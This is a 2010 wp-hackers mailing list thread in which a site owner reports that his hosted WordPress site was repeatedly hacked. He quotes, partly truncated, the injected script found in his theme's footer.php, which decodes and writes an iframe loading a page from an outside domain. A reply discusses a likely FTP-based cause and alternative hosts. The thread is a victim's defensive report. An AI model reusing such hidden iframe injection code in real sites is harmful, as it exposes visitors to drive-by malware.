[wp-hackers] wordpress theme script injection (hosted on dreamhost)
mladen.adamovic at gmail.com
Sun Oct 31 16:50:06 UTC 2010
Regarding hosting - I have other websites hosted at my dreamhost account and
they haven't been hacked hacked so far . That's good otherwise I'll have
days of work to fix it.
Godaddy has slow and unresponsive panel comparing to dreamhost - I have some
websites hosted there as well.
I understand that some individuals and companies are offering Wordpress
hosting however for me Blogger could do - and it's free. Since my blog has
around 25 readers I don't have economical reasons to pay for managed
On Sun, Oct 31, 2010 at 4:17 PM, Vid Luther <vid at zippykid.com> wrote:
> Instead of switching platforms completely, I would recommend first
> changing hosts, go with mediatemple, godaddy, rackspace, page.ly,
> wpengine, my company, or even godaddy.. their UI sucks, but their phone
> support is fairly decent.
> As for the exploit, it may not be a wordpress exploit, but an ftp
> attack, as it's just looking for filesystem paths and injecting to it.
> I'm assuming by default theme footer, you meant twentyten theme, and
> footer.php ?
> Mladen Adamovic wrote:
> > Hi guys,
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> > I don't know which exploit it did use and couldn't identify it, but it
> > adding the following code to my default theme footer.php:
> > <script>
> > enc =
> > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> > I think I'll have to migrate to Blogger, since I couldn't identify
> > it did use.
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
> Vid Luther
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
More information about the wp-hackers